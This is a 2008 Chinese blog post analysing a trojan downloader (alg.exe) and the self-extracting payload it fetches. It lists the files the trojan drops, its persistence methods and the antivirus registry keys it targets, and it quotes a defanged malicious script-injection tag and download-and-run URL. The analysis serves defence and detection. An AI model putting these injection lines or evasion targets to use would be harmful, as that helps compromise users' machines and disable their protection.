对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析

最新推荐文章于 2021-10-28 13:54:04 发布
最新推荐文章于 2021-10-28 13:54:04 发布
阅读量1.5k 收藏
点赞数
分类专栏: 系统维护 文章标签: c dll 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2111235
版权

对 Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析

endurer 原创
2008-02-21 第1

就是

Worm.Win32.Diskgen.gen/磁碟机也捎带广告?
http://blog.csdn.net/Purpleendurer/archive/2008/02/20/2110363.aspx

中的捕获的一个病毒文件。

文件说明符 : C:/WINDOWS/system32/drivers/alg.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-18 16:17:10
修改时间 : 2008-2-18 16:17:12
访问时间 : 2008-2-18 0:0:0
大小 : 18829 字节 18.397 KB
MD5 : e6b26c23fda20664844d870a662190da
SHA1: 30930C99E99E108AC8B06D19DB9D2056A552DD82
CRC32: ad1b25ac

Kaspersky 报为 Trojan-Downloader.Win32.Agent.iqj,瑞星报为 Trojan.DL.Win32.Mnless.yxx

alg.exe运行后会:

1.执行命令:
ping.exe www.baidu.com
arp.exe -s (将IP与MAC绑定)
arp.exe -d (清空ARP缓存)

2.加入代码:
/---
<script src=hxxp://y**.g***xg*xy.net/1.js></script>
---/
hxxp://y**.g***xg*xy.net/1.js为一个 包含“百万Q币大放送”等虚假信息的网页


3.下载、运行 hxxp://y**.g***xg*xy.net/setup.exe

文件说明符 : D:/test/setup.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-18 21:41:59
修改时间 : 2008-2-18 21:42:0
访问时间 : 2008-2-18 22:18:54
大小 : 144381 字节 140.1021 KB
MD5 : 8e23a5a2b949cb6c2c2b4037684219d1

Kaspersky 报为 Virus.Win32.Xorer.dr,其实为一个自解压程序:

;下面的注释包含自释放脚本命令
Setup=Setup.exe
TempMode
Silent=1
Overwrite=1

文件说明符 : D:/test/setup/Setup.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-18 21:44:15
修改时间 : 2008-2-16 12:49:2
访问时间 : 2008-2-18 22:19:13
大小 : 95744 字节 93.512 KB
MD5 : 13949cf3910b0d255439136ec1b6cd78
SHA1: 4D873D332FEDDEF66B90940CA18418FE91833EA7
CRC32: 652ce9ac

Setup.exe运行后

1、释放驱动: NetApi000.sys、文件:00302.log、cfg.dll、C:/WINDOWS/system32/Com/netcfg.000、C:/WINDOWS/system32/Com/netcfg.dll
C:/WINDOWS/system32/Com/SMSS.EXE等文件
并用命令regsvr32.exe /s 注册其中的DLL文件

2、会将自己复制到:
1)C:/WINDOWS/system32/Com,文件名:lsass.exe
2)C:/Documents and Settings/All Users/「开始」菜单/程序/启动 文件夹中,文件名格式为 ~.exe.*******.exe(其中*为数字)
3)各硬盘分区。文件名为pagefile.pif,相应的autorun.inf文件也会被创建

3、扫描、修改注册表项,如:
安全启动项:
SYSTEM/CurrentControlSet/Control/SafeBoot/Network/{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM/ControlSet001/Control/SafeBoot/Network/{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM/CurrentControlSet/Control/SafeBoot/Minimal/{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM/ControlSet001/Control/SafeBoot/Minimal/{4D36E967-E325-11CE-BFC1-08002BE10318}

系统安全防护软件的服务项:
SYSTEM/CurrentControlSet/Services/EQService
SYSTEM/CurrentControlSet/Services/HookSys
SYSTEM/CurrentControlSet/Services/McShield
SYSTEM/CurrentControlSet/Services/tmmbd
SYSTEM/CurrentControlSet/Services/PAVSRV
SYSTEM/CurrentControlSet/Services/SymEvent
SYSTEM/CurrentControlSet/Services/ekrn
SYSTEM/CurrentControlSet/Services/KAVBase
SYSTEM/CurrentControlSet/Services/klif
SYSTEM/CurrentControlSet/Services/AntiVirService
SYSTEM/CurrentControlSet/Services/MPSVCService

4、狙击常见安全软件。如:avast、itdefender、ewido、微点、费尔、eset、avg、dr.web等 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
操作123456
qq_65648226的博客
04-28 3340
1.拼音缩写函数 DELIMITER $$ USE `mpos`$$ CREATE FUNCTION `mysql`.`pysx`( wz VARCHAR(20)) RETURNS VARCHAR(20) CHARSET utf8 BEGIN SET @i=1; SET @mcsx=''; SET @len=CHAR_LENGTH(wz); WHILE(@i<=@len) DO S...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
Purpleendurer@CSDN
02-04 1373
某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rqendurer 原创2008-02-04 第1版在该坛页面中发现代码:/---<iframe src=hxxp://www.i***p*5*60.com/error.htm width=100 height=1></iframe>---/1 hxxp://www.i***p*5*60.com/error.h
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
Purpleendurer@CSDN
04-30 2084
endurer 原创2007-04-30 第1版该网站的留言板页面:/---<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>---/被植入代码:/---<iframe src
signature=df7d8ae98d6f3f1b52b9209e655b0ff2,cheat-engine/frmmicrotransactionsunit.lfm at master · che...
热门推荐
weixin_30703633的博客
05-30 13万+
object frmMicroTransactions: TfrmMicroTransactionsLeft = 826Height = 240Top = 87Width = 320AutoSize = TrueBorderIcons = [biSystemMenu]BorderStyle = bsDialogCaption = 'Cheat-E-Coins'ClientHeight = 240C...
来都来了,你确定不看看,使用python中的科学计算库Numpy操作数组,你一定能学废(图文并茂版)
但行好事,莫问前程
10-28 510
Numpy操作数组Numpy库Numpy库的介绍Numpy库的安装:python中数组与列表对比列表:数组:数组的创建使用array方法创建数组注意:ndmin,dtype参数的使用使用arange方法创建数组使用random(随机数)方法创建数组其它方式创建数组数组对象的属性数组的切片与索引改变数组的维度数组的转置Numpy聚合函数 Numpy库 Numpy库的介绍 NumPy(Numerical Python) 是科学计算基础库,提供大量科学计算相关功能,比如数据 统计,随机数生成等。其提供最核心类型
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
描述中提到的“Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic”进一步确认了这是一个跨平台的蠕虫木马源代码,是用REALBasic编程语言编写的。REALBasic是一种基于Basic的集成开发...
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe
03-19
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
AxureRP 9.0.0.3714.7z
09-30
Axure RP 9.0.0.3714 是一款强大的原型设计工具,主要用于创建交互式的网页和应用程序原型。这款软件广泛应用于IT行业的设计师、产品经理以及开发人员,帮助他们在项目初期快速构建概念模型,进行功能规划和用户体验...
laravel-5.2.31.zip
05-26
同时,模型间可以通过定义关系(如一对一、一对多、多对多)来处理复杂的数据关联。 ### 8. 任务调度与队列 Laravel的任务调度允许开发者安排定时任务,如清理缓存、发送邮件等。队列服务则处理异步任务,提高应用...
节操视频播放器
04-05
作者lipangit,源码jiecaovideoplayer,真正实现Android的全屏功能,励志成为Android平台使用最广泛的视频播放控件,GitFlow流程开发develop分支是最新版本。
离职华为人的感受
weixin_30835649的博客
08-24 236
发信站: 瀚海星云 (2010年08月23日09:17:29 星期一), 站内信件 WWWPOST本人在华为待了大概10个月时间,工号159xxx,只能算是个毛孩子,对公司的了解还不够深刻。下面这些东西是当时离开公司的时候写的。我所在的部门是在GTS,客户支持服务部的中国GTAC,估计很多同事都知道我是谁了。先说明,我了解的东西是基于我所在的部门和职位,奶总的职位我不了解,和奶总一起喝酒吃饭很多,...
大华门禁SDK二次开发(二)-SignalR应用
weixin_30739595的博客
11-22 1144
经过与大华技术支持的沟通,门禁服务程序已经开发好了,可以正常接收门禁开关事件,可以发送开门命令。基于项目实时性要求,这里使用SignalR实现门禁状态、控制命令的实时传送。 几种场景需求 根据SignalR的设计规则,Client端可以主动调用服务端Hub的多个方法,但是客户端被动接收消息的方法只能有一个。 根据门禁功能需求,我们将Client分为两组: doorclient:指Web...
WIN32,_WIN32_WIN64
weixin_30908649的博客
03-11 469
MSDN 里说,VC 有 3 个预处理常量,分别是 _WIN32,_WIN64,WIN32。 只要包含了 Windows.h,那么 WIN32 常量是肯定定义了的,所以不能用于判断平台环境(如果x64预编译器中未定义WIN32,可以手动加上去) Win32 配置下,_WIN32 有定义,_WIN64 没有定义。在 x64 配置下,两者都有定义。即在 VC 下,_WIN32 一定有定...
某留学网站被植入利用 PPStream 堆栈漏洞的代码
Purpleendurer@CSDN
09-30 1428
某留学网站被植入利用 PPStream 堆栈漏洞的代码endurer 原创2007-09-30 第1版网站被植入代码:/---<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe> ---/hxxp://xxx.7**45*97**0.com/newdm/new05.ht
mplayer
shaowei的博客
10-01 2508
最基本的播放命令 mplayer music.mp3 就可以播放music.mp3这个音频了、视频也是如此 mplayer /home/test/Music/* 这个就是播放Music目录下的所有音乐,是按一定顺序播放的。 mplayer /home/test/Music/* -shuffle 这个是播放Music目录下的所有音乐,但是后面加的那个参数是随机播放的。 ...
AVAudioSession初探
weixin_30405421的博客
09-18 242
根据文档,AudioSession规定了app和系统音频行为交互的规范,一个app只有一个AudioSession的单例。 app通过设置自己AudioSession的单例的属性来告诉系统自身想达到的效果,系统会根据app的申请,并综合考虑其他app的AudioSession的属性来决定最后硬件的音频输入和输出。 AVAudioSession的category AVAudioSession...
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等3
caobihole
08-13 210
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等3 endurer 原创2007-08-13 第1版 文件说明符 : C:/WINDOWS/netdde32.exe属性 : -SH-获取文件版本信息大小失败!创建时间 : 2007-8-10 8:4:22修改时间 : 2005-10-19 9:19:16访问时间 : 2007-8-10 0:0:0大小 : 46...
在线加密解密
dianyu4558的博客
07-21 1229
http://encode.chahuo.com/ 转载于:https://www.cnblogs.com/caobiin/p/7216359.html
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
最新发布
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值